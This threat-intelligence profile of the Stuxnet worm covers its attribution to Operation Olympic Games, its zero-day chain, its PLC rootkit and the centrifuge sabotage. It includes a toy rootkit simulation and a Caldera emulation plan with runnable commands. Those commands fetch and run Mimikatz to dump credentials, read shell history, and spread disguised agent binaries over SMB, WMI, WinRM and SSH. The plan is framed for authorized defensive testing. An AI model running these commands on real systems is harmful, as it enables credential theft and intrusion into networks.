Threat Actor

Stuxnet

stuxnet · us_israel_joint_offensive_cyber · active since 2005

Stuxnet (Symantec name W32.Stuxnet; first identified by VirusBlokAda's Sergey Ulasen on June 17, 2010; called "the bug" internally by its US and Israeli developers before public identification; operation codename "Olympic Games" per David Sanger's June 2012 New York Times reporting and his book "Confront and Conceal") is a computer worm that targeted the Siemens supervisory control and data acquisition (SCADA) software and programmable logic controllers (PLCs) driving the gas centrifuges of Iran's Natanz uranium enrichment facility. It is the most closely studied cyber operation in public industry analysis and a string of firsts: the first publicly known cyber weapon to cause substantial physical damage to industrial infrastructure, the first publicly known nation-state-attributed cyber-sabotage operation against critical industrial infrastructure, the first publicly known PLC rootkit, and the first publicly known operation to chain four Windows zero-days.

Attributed to the joint US-Israeli Operation Olympic Games (David Sanger, New York Times, June 2012, and "Confront and Conceal", 2012, on extensive governmental sourcing): originated under the Bush administration in 2006, when General James Cartwright and intelligence officials presented the cyber weapon to Bush as an alternative to an Israeli conventional strike; accelerated under the Obama administration from 2009; run by the NSA and CIA on the US side and IDF Unit 8200 on the Israeli side.

Yahoo News (Kim Zetter and Huib Modderkolk, September 2, 2019) widened the cast to five intelligence services, reportedly matching the five-ring Olympic symbol: the US, Israel, the Netherlands, Germany, and either the UK or France. The same report disclosed the previously unknown role of the Dutch AIVD (General Intelligence and Security Service): an AIVD-recruited insider carried Stuxnet into the air-gapped Natanz facility on a USB drive.

Target: Iran's Natanz uranium enrichment facility, specifically the Siemens S7-315 (S7-300 family) and S7-417 (S7-400 family) PLCs, the WinCC SCADA software and the Step 7 engineering software controlling the IR-1 gas centrifuge cascades. Physical effect: roughly 1,000 of the 5,000 IR-1 centrifuges (about 20% of Iran's enrichment capacity at the time) were destroyed. The S7-315 payload, documented by Symantec, rewrote the setpoints of the frequency-converter drives that set rotor speed, driving centrifuges far above and then far below normal speed; the S7-417 payload analysed by Langner targeted the cascade valves and pressure control. In both cases recorded normal readings were replayed to the operators' screens, so failures looked like engineering mistakes and were blamed on the Iranian scientists rather than on an attack.

Exploit chain: four Windows zero-days at the time of discovery, CVE-2010-2568 (LNK shortcut icon parsing, automatic code execution from USB drives and shares), CVE-2010-2729 (Print Spooler remote code execution), CVE-2010-2743 (win32k kernel-mode driver keyboard-layout privilege escalation) and CVE-2010-3338 (Task Scheduler privilege escalation), plus two already-known weaknesses, CVE-2008-4250 (MS08-067 Server service RPC) and CVE-2010-2772 (Siemens WinCC hard-coded database password). Its kernel drivers were signed with code-signing certificates stolen from Realtek Semiconductor and JMicron Technology, both Taiwanese, so Windows driver-signature enforcement loaded them without complaint.

Delivery and propagation: USB-drive physical introduction into the air-gapped Natanz facility by the AIVD-recruited insider; five Iranian contractor organizations as patient zero (Behpajooh Co. Elec & Comp. Engineering, Foolad Technic, Neda Industrial Group, Control-Gostar Jahed and Kala Electric; Symantec's W32.Stuxnet Dossier by Falliere, O'Murchu and Chien traced the infections to five initial organizations, and the names were published in later research); onward spread through infected Step 7 project files, removable drives and LAN propagation (MS08-067, the Print Spooler and network shares). A programming error let the worm escape the target environment and infect hundreds of thousands of computers worldwide, including in India, Indonesia and Pakistan, which is what led to its discovery by VirusBlokAda's Sergey Ulasen on June 17, 2010.

Key analysis: Symantec's W32.Stuxnet Dossier (Falliere, O'Murchu and Chien, 2010-2011); Ralph Langner's ICS and Siemens PLC payload analysis (2010-2011); and Kaspersky GReAT's December 2011 "Tilded" platform analysis, which showed that Stuxnet and Duqu share a driver codebase and ties this cluster to its sibling Duqu.

This cluster fills the first Olympic Games / US-Israel joint cyber-operations cell in the curated corpus and precedes its siblings Flame (2nd) and Duqu (3rd). Iran's direct response was to build one of the largest cyber-warfare establishments in the world (tracked separately as the Iranian state-sponsored clusters), a case of an operation provoking adversary capability investment rather than deterring it.

Stuxnet remains the baseline "first cyber weapon causing substantial physical damage" against which essentially all subsequent ICS/SCADA and critical-infrastructure cyber-operation analysis is measured (2010-2026).

us_israel_joint_offensive_cyber confidence: high 16 aliases

Profile

Stuxnet (Symantec name W32.Stuxnet; first identified by Sergey Ulasen of VirusBlokAda on June 17, 2010; referred to internally by its US and Israeli developers as "the bug" before public identification; operation codename "Olympic Games" per David Sanger's June 2012 New York Times reporting and his book "Confront and Conceal") is a computer worm that targeted the Siemens WinCC/Step 7 supervisory software and S7 programmable logic controllers running the gas centrifuges of Iran's Natanz uranium enrichment facility. It is the most closely studied cyber operation in public industry analysis: the first publicly known cyber weapon to cause substantial physical damage, the first publicly known PLC rootkit, and the first publicly known nation-state-attributed cyber-sabotage operation against critical industrial infrastructure. Attribution to the joint US-Israeli Operation Olympic Games rests on multiple convergent lines of governmental-source-cited investigative journalism from 2010 onward. Neither the US nor Israel has openly admitted responsibility, but multiple independent news organizations have reported Stuxnet as a cyberweapon built jointly by the two countries.

Operational phases:
  • (1) Olympic Games origination (2006): General James Cartwright and intelligence officials present offensive cyber-weapon code to President Bush as an alternative to an Israeli conventional strike.
  • (2) Stuxnet development (c. 2005-2009): a multi-year, state-level development cycle; Symantec later dated an early variant (Stuxnet 0.5) to 2005-2007.
  • (3) Obama administration acceleration (2009): the operation is expanded.
  • (4) First installation at Natanz (2009): USB-drive delivery into the air-gapped facility by the AIVD-recruited insider; the earliest known sample of the main variant was compiled in June 2009.
  • (5) Accidental international spread (2010): a programming error lets the worm leave the target environment.
  • (6) VirusBlokAda discovery (June 17, 2010): Sergey Ulasen identifies Stuxnet.
  • (7) Symantec W32.Stuxnet Dossier (September 2010 - February 2011): Falliere, O'Murchu and Chien's comprehensive technical analysis.
  • (8) Langner ICS analysis (2010-2011): Ralph Langner's Siemens PLC payload analysis.
  • (9) Kaspersky Tilded platform attribution (December 2011): shared driver codebase with Duqu.
  • (10) David Sanger NYT disclosure (June 2012): Operation Olympic Games attribution.
  • (11) Yahoo News AIVD disclosure (September 2, 2019): five-country participation and the USB-drive insider delivery vector.
  • (12) Continued industry reference status (2010-2026): the baseline "first cyber weapon causing substantial physical damage".

Signature operational tradecraft
  • First publicly known cyber weapon causing substantial physical damage (cluster-defining): per Sandboxx, it opened the era of cyber operations that do physical damage to critical industrial infrastructure.
  • First publicly known programmable logic controller (PLC) rootkit (cluster-defining): per Wikipedia, "the first to include a programmable logic controller (PLC) rootkit." Stuxnet replaced the Step 7 communication library s7otbxdx.dll with a wrapper that hooked block read, write and enumerate calls, so the engineering station never saw the blocks injected into the PLC.
  • Four-zero-day exploit chain (cluster-defining): CVE-2010-2568 (LNK shortcut auto-execution), CVE-2010-2729 (Print Spooler), CVE-2010-2743 (win32k kernel-mode driver privilege escalation) and CVE-2010-3338 (Task Scheduler privilege escalation), all unpatched at discovery, plus the previously known CVE-2008-4250 (MS08-067 RPC) and CVE-2010-2772 (Siemens WinCC hard-coded database password). Four zero-days in one operation was the most seen in a single piece of malware at the time.
  • Stolen code-signing certificates (signature): certificates belonging to Realtek Semiconductor and JMicron Technology, both Taiwanese, were used to sign the kernel drivers, which is why Windows code-integrity enforcement loaded them.
  • Air-gapped Natanz USB-drive deployment: initial delivery by USB flash drive through physical access, carried in by an AIVD-recruited insider per Yahoo News, September 2019.
  • Five Iranian patient-zero organizations (signature): Symantec traced the infections to five initial organizations in Iran, named in later research as Behpajooh Co. Elec & Comp. Engineering, Foolad Technic, Neda Industrial Group, Control-Gostar Jahed and Kala Electric.
  • Siemens S7-315 / S7-417 PLC, WinCC SCADA and Step 7 software target (signature): the cluster-defining ICS target.
  • IR-1 gas centrifuge speed manipulation (signature): the cluster-defining sabotage capability; the S7-315 payload rewrote frequency-converter setpoints to push rotor speed far above and then far below the normal range, and the S7-417 payload manipulated cascade valves and pressure control, stressing the centrifuges to failure.
  • Operator-blame tradecraft (signature): recorded normal values were replayed to the monitoring screens, so the Iranian scientists saw nothing wrong and the resulting failures were blamed on the engineers and the equipment rather than on an attack.
  • Five-country intelligence participation (signature): the Olympic Games codename reportedly refers to the five-ring Olympic symbol, one ring per participating service: US (NSA and CIA), Israel (Unit 8200), the Netherlands (AIVD), Germany, and either the UK or France.
  • Accidental international spread (signature): a programming error let the worm infect hundreds of thousands of computers worldwide, which led directly to its public discovery.
  • ~1,000 of 5,000 IR-1 centrifuges destroyed (signature physical effect): approximately 20% of Iran's uranium-enrichment capacity at the time.
  • Tilded platform shared with Duqu (signature): per Kaspersky, December 2011, a shared driver codebase that links this cluster to its sibling Duqu. The cluster fills the first Olympic Games / US-Israel joint cyber-operations cell in this curated corpus and is the "first cyber weapon causing substantial physical damage" reference point cited as the comparative baseline in essentially all subsequent ICS / SCADA / critical-infrastructure cyber-operation analysis.
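A toy model of the PLC-rootkit mechanism from the bullets above (the engineering-station library hooked so that injected blocks are invisible), added here as an illustration; it is not code from this page, from Stuxnet, or from any of the cited analyses. The s7otbxdx.dll library and the s7blk_read / s7blk_write / s7blk_findfirst / s7blk_findnext hook points are the ones Symantec documented; the in-memory "PLC", the driver API, the STL snippets and the block numbers FC1869 / DB890 are constructed for the simulation. It also shows the check a defender actually needs: an integrity audit that reads the CPU through a path the wrapper does not control.

```python
"""Toy model of the Step 7 PLC rootkit technique (added illustration, not
Stuxnet code).  Stuxnet replaced Siemens' s7otbxdx.dll with a wrapper that
hooked block read/write/enumerate calls (s7blk_read, s7blk_write,
s7blk_findfirst/s7blk_findnext): the engineer downloaded the project, the
wrapper silently added attack blocks, and every later read or listing through
the same library returned the untouched originals.  The PLC store, driver API
and block names below are constructed for the simulation."""

from typing import Dict, List, Optional


class Plc:
    """What the CPU actually holds and executes."""

    def __init__(self) -> None:
        self.blocks: Dict[str, str] = {}

    def read(self, name: str) -> Optional[str]:
        return self.blocks.get(name)

    def write(self, name: str, code: str) -> None:
        self.blocks[name] = code

    def list_blocks(self) -> List[str]:
        return sorted(self.blocks)


class S7Driver:
    """The honest communication library the engineering software links against."""

    def __init__(self, plc: Plc) -> None:
        self.plc = plc

    def s7blk_read(self, name: str) -> Optional[str]:
        return self.plc.read(name)

    def s7blk_write(self, name: str, code: str) -> None:
        self.plc.write(name, code)

    def s7blk_find(self) -> List[str]:          # stands in for findfirst/findnext
        return self.plc.list_blocks()


# Block numbers chosen for the simulation; the real ones are in the Symantec dossier.
INJECTED = {"FC1869": "// attack logic", "DB890": "// attack state"}
HOOK_TARGETS = ("OB1", "OB35")                 # cyclic main block and 100 ms timer block
TRAMPOLINE = "CALL FC1869\n"                   # prepended so the real block runs the payload


class RootkitDriver(S7Driver):
    """Same API as S7Driver: injects on write, lies on read and enumerate."""

    def __init__(self, plc: Plc) -> None:
        super().__init__(plc)
        self._originals: Dict[str, str] = {}   # clean copies shown back to the engineer

    def s7blk_write(self, name: str, code: str) -> None:
        if name in HOOK_TARGETS:
            self._originals[name] = code        # remember what the engineer wrote
            for blk, body in INJECTED.items():  # plant the payload blocks
                self.plc.write(blk, body)
            code = TRAMPOLINE + code            # hook the real block into the payload
        self.plc.write(name, code)

    def s7blk_read(self, name: str) -> Optional[str]:
        if name in INJECTED:
            return None                         # injected blocks "do not exist"
        return self._originals.get(name, self.plc.read(name))

    def s7blk_find(self) -> List[str]:
        return [b for b in self.plc.list_blocks() if b not in INJECTED]


def audit(engineering_view: S7Driver, plc: Plc) -> Dict[str, List[str]]:
    """Integrity check that does NOT trust the engineering station's library: compare
    its view with an independent read of the CPU (a second host with a known-clean
    library, or the S7 protocol traffic captured on the wire)."""
    seen = set(engineering_view.s7blk_find())
    actual = plc.list_blocks()
    hidden = [b for b in actual if b not in seen]
    tampered = [b for b in actual
                if b in seen and engineering_view.s7blk_read(b) != plc.read(b)]
    return {"hidden_blocks": hidden, "tampered_blocks": tampered}


def demo() -> Dict[str, object]:
    """Engineer downloads a project through the trojanised library, then re-reads it."""
    plc = Plc()
    drv = RootkitDriver(plc)
    project = {"OB1": "L 0\nBE\n", "OB35": "CALL FC100\nBE\n"}  # constructed STL
    for name, code in project.items():
        drv.s7blk_write(name, code)
    return {
        "engineer_blocks": drv.s7blk_find(),
        "engineer_sees_original": all(drv.s7blk_read(n) == c for n, c in project.items()),
        "plc_blocks": plc.list_blocks(),
        "plc_ob35": plc.read("OB35"),
        "audit": audit(drv, plc),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The engineer's view (two blocks, original contents) and the CPU's contents (four blocks, OB1 and OB35 rewritten to call the payload) disagree, and only the audit that bypasses the hooked library notices. That is the practical lesson: any "verify the PLC program" step run from the same engineering station inherits the lie.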

Aliases

16
stuxnet · stuxnet worm · w32_stuxnet · w32.stuxnet · stuxnet ics scada worm · operation_olympic_games · operation olympic games · olympic_games_operation · olympic games · the bug · w32.stuxnet dossier · stuxnet natanz · stuxnet siemens plc · first cyber weapon physical damage · us israel joint cyber sabotage iran nuclear · ir-1 centrifuge sabotage

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile "Worm - Move laterally any way possible". Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command (the #{...} tokens are Caldera facts filled in at run time). For authorized red-team / purple-team exercises only. Note that this is Caldera's generic lateral-movement worm profile for Windows, macOS and Linux hosts: it exercises credential theft and SSH, SMB, WinRM and WMI movement, not Stuxnet's own USB/LNK delivery, Step 7 project-file infection or PLC payload, so treat it as a test of your lateral-movement detection rather than of Stuxnet-specific coverage.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
cat ~/.bash_history 2>/dev/null; find ~/.bash_sessions -type f -exec cat {} \; 2>/dev/null   # ~/.bash_sessions exists only on macOS; Linux keeps ~/.bash_history
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows
Run PowerKatz
# Disables TLS certificate validation, fetches Invoke-Mimikatz from a pinned PowerSploit commit and runs it in memory; expect AMSI / EDR to block this on a defended host, which is the point of the test.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
8 lateral-movement T1570 · Lateral Tool Transfer windows
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
# Drops the agent binary into the remote Public profile over the mounted admin share
Copy-Item -Verbose -Path $path -Destination "$drive\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
10 execution T1047 · Windows Management Instrumentation windows
Start 54ndc47 (WMI)
# The triple single quotes yield a quoted argument for wmic; note that wmic.exe is deprecated and absent from recent Windows 11 builds, where Invoke-CimMethod Win32_Process Create is the equivalent
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
# Launches the binary copied in step 9 as a detached job so the session can be torn down
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

13
2019 · AIVD Dutch Intelligence Iranian Engineer Recruitment Disclosure (September 2, 2019)
2012 · David Sanger NYT Canonical Olympic Games Disclosure (June 2012)
2011 · Kaspersky Tilded Platform Attribution (December 2011)
2010-2026 · Continued Industry Reference Status (2010-2026)
2010-2011 · Symantec W32.Stuxnet Dossier Canonical Analysis (September 2010 - February 2011)
2010-2011 · Ralph Langner ICS Analysis (2010-2011)
2010 · Stuxnet VirusBlokAda Discovery (June 17, 2010)
2010 · Stuxnet Accidental International Spread (2010)
2009-2010 · Stuxnet Physical Damage Assessment, 1,000 IR-1 Centrifuges (2009-2010)
2009 · Stuxnet First Installed at Natanz (2009)
2009 · Stuxnet Obama Administration Acceleration (2009)
2006 · Operation Olympic Games Origination (Bush 2006)
2005-2009 · Stuxnet Development (c. 2005-2009)

Attribution & Reporting

Key reporting
  • Symantec (Nicolas Falliere, Liam O'Murchu, Eric Chien): W32.Stuxnet Dossier (September 2010 - February 2011, v1.4), the reference technical analysis
  • Langner Communications (Ralph Langner): Stuxnet ICS / Siemens PLC payload analysis (2010-2011), the reference industrial-control-system domain analysis
  • Kaspersky Lab GReAT: Stuxnet / Duqu "Tilded" platform analysis (December 2011), establishing the shared driver codebase
  • VirusBlokAda (Sergey Ulasen): first identification of Stuxnet (June 17, 2010)
  • CrySyS Lab Budapest: discovery and analysis of Duqu (2011), which established the link to Stuxnet
  • F-Secure (Mikko Hyppönen): Stuxnet historical analysis
  • MAHER Center, Iranian national CERT: Stuxnet impact analysis for Iran
  • Atomic Energy Organization of Iran: acknowledgment of damage at Natanz
  • David Sanger (New York Times): "Obama Order Sped Up Wave of Cyberattacks Against Iran" (June 1, 2012), the Olympic Games disclosure
  • David Sanger: "Confront and Conceal: Obama's Secret Wars and Surprising Use of American Power" (book, 2012), the book-length Olympic Games disclosure
  • Yahoo News (Kim Zetter, Huib Modderkolk): "Revealed: How a Secret Dutch Mole Aided the US-Israeli Stuxnet Cyber Attack on Iran" (September 2, 2019), the five-country participation and AIVD insider disclosure
  • Kim Zetter: "Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon" (book, 2014), the comprehensive book-length account
  • Mandiant / Google Threat Intelligence Group: Stuxnet historical context
  • MITRE ATT&CK Software S0603: Stuxnet
  • Malpedia software profile: Stuxnet

Operational

State sponsor

United States and Israel, as a joint offensive cyber operation, attributed through multiple convergent lines of reporting: leaks and governmental-source-cited investigative journalism from 2010 through 2019 and beyond. Neither government has openly admitted responsibility, but multiple independent news organizations have reported Stuxnet as a cyberweapon built jointly by the two countries in a collaborative effort known as Operation Olympic Games (as compiled on Wikipedia). Attribution timeline:

(1) David Sanger, New York Times, June 2012, followed by the book "Confront and Conceal: Obama's Secret Wars and Surprising Use of American Power" (2012). Sanger's reporting, based on extensive governmental sourcing, established: (a) origination of Olympic Games under the George W. Bush administration in 2006; (b) acceleration under the Obama administration; (c) joint US-Israeli development; (d) US participation by the NSA and CIA; (e) Israeli participation by IDF Unit 8200.

(2) General James Cartwright. Per Wikipedia: "During president Bush's second term, General James Cartwright, then head of United States Strategic Command, along with other intelligence officials presented Bush with sophisticated code that would act as an offensive cyber weapon." Cartwright was later investigated by the US Justice Department over the alleged leak to Sanger; he pleaded guilty in 2016 to making false statements to investigators and was pardoned by Obama in January 2017.

(3) Five-country participation (signature). Per Yahoo News, September 2019, with GlobalSecurity and Tribune India compilations: "The operation received the codename 'Olympic Games', reportedly a reference to the five-ring Olympic symbol representing the intelligence agencies of five countries involved: the United States, Israel, the Netherlands, Germany, and either the United Kingdom or France." The Yahoo News report of September 2, 2019 added that AIVD, the Dutch intelligence service, recruited an insider (described in that report as an Iranian engineer) who carried Stuxnet into the air-gapped Natanz facility on a USB drive; a January 2024 de Volkskrant investigation identified the mole as Dutch national Erik van Sabben. This depth of attribution is rare in cyber-operation analysis.

(4) US strategic rationale. Bush reportedly saw cyber-sabotage as the only way to prevent an Israeli conventional strike on Iranian nuclear facilities (compare Israel's 2007 Operation Orchard strike on Syria's Al-Kibar reactor site): covert strategic coercion substituting for a kinetic attack.

(5) Israeli contribution. Per GlobalSecurity: "Israel possessed deep intelligence about operations at Natanz that would be vital to making the cyber attack succeed. Israeli intelligence, particularly the elite signals intelligence unit known as Unit 8200, had cultivated sources within Iran's nuclear program and maintained sophisticated technical surveillance of Iranian activities."

Mission objective: disrupt, sabotage and delay Iranian uranium enrichment at Natanz by covertly modifying the Siemens Step 7 programs on the PLCs driving the IR-1 centrifuge cascades, while the operators' displays continued to show normal values so that failures would be blamed on the engineers and the equipment rather than on an attack.

Delivery and spread:
(a) Natanz was air-gapped (not connected to the internet), so initial delivery was by USB drive through physical access. Per the Yahoo News 2019 reporting, the AIVD-recruited insider introduced Stuxnet to the facility's internal systems.
(b) Five Iranian patient-zero organizations. Symantec's W32.Stuxnet Dossier (Nicolas Falliere, Liam O'Murchu, Eric Chien; v1.4, February 2011) traced the infections back to five initial organizations in Iran, named in later research as Behpajooh Co. Elec & Comp. Engineering, Foolad Technic, Neda Industrial Group, Control-Gostar Jahed and Kala Electric. Stuxnet was designed to reach the isolated Natanz network from these contractors via USB drives, LAN propagation and infected Step 7 project files.
(c) Accidental international spread. Per Sanger and Wikipedia, a programming error let Stuxnet escape Natanz when an engineer connected his work computer to the internet: the code was supposed to recognize that it had left the target environment and stop replicating, but that check failed, and the worm spread across the internet to hundreds of thousands of computers worldwide. Symantec's own telemetry counted roughly 100,000 infected hosts, about 60% of them in Iran. The accident is what led to Stuxnet's public discovery.
(d) Discovery, June 17, 2010. Per GlobalSecurity: "An Iranian company unconnected to the nuclear program experienced mysterious computer problems, system crashes, blue screens of death, and unusual behavior even after fresh operating system installations. The firm's security specialist contacted a friend working for VirusBlokAda, a Belarusian antivirus company. Sergey Ulasen, who was at a wedding reception when he received the call, spent the evening on the phone with his Iranian contact trying to diagnose the problem." June 17, 2010 is the accepted discovery date.

Physical effect: approximately 1,000 of the 5,000 IR-1 centrifuges at Natanz were destroyed, roughly 20% of Iran's uranium-enrichment capacity at the time. Per Wikipedia: "The malicious software temporarily halted approximately 1,000 of the 5,000 centrifuges from spinning at Natanz." Mechanism: the S7-315 payload documented by Symantec periodically rewrote the setpoints of the frequency-converter drives that control rotor speed, running the centrifuges far above and then far below normal operating speed for minutes at a time and stressing the rotors to failure; the S7-417 payload analysed by Langner targeted the cascade's valves and pressure regulation. In both cases recorded normal sensor values were replayed to the monitoring layer, so the operators saw nothing wrong. Per Sandboxx, this was the first publicly known instance of a cyberweapon producing substantial physical effects on a target of major geopolitical interest.

Classification: a nation-state cyber-sabotage operation, the most closely studied in public industry analysis, and the one that opened the era of cyber operations doing physical damage to critical industrial infrastructure. The cluster fills the first Olympic Games / US-Israel joint cyber-operations cell in this curated corpus and serves as the "first cyber weapon causing substantial physical damage" reference point.

Motivations
iranian_uranium_enrichment_program_disruption_via_centrifuge_sabotage, prevention_of_israeli_conventional_military_strike_against_iran_nuclear_facilities, first_cyber_weapon_substantial_physical_damage_capability_demonstration, us_israel_joint_offensive_cyber_capability_demonstration, ics_scada_industrial_control_system_targeting_capability_demonstration, programmable_logic_controller_plc_rootkit_capability_demonstration, covert_strategic_coercion_via_cyber_sabotage_replacing_kinetic_strike, operator_blame_pattern_subtle_sabotage_tradecraft
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)33/60 · 55%
Analytics (MITRE CAR)19/60 · 31%
Runtime / container (Falco)4/60 · 6%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)9/60 · 15%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

23 techniques
Runnable Atomic Red Team tests covering this actor's mapped techniques: validate your detections against this specific adversary, cross-referencing the blind spots above. For authorized lab / purple-team use.

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
  • SIEMENS S7-300 S7-400 PLC TARGET
  • STEP 7 PROJECT FILE LATERAL PROPAGATION
  • STUXNET LADDER LOGIC PAYLOAD
  • STUXNET STEP7 PLC ROOTKIT
  • STUXNET WINDOWS COMPONENTS
  • STUXNET WORM
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin